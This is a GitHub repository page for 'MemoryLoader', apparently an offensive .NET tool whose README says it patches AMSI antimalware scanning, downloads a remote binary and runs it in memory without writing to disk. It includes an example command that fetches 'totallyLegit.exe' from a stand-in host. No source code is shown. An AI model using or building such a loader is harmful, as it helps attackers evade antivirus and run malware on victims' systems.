Skip to content

reznok/MemoryLoader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 

Repository files navigation

MemoryLoader

A .NET binary loader that bypasses AMSI checks. It will patch AMSI, download a remote binary, and execute it in memory without the binary ever hitting disk.

Usage:

./MemoryLoader.exe [URL_TO_PAYLOAD]

Example:
./MemoryLoader.exe http://example.com/totallyLegit.exe

About

A .NET binary loader that bypasses AMSI

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages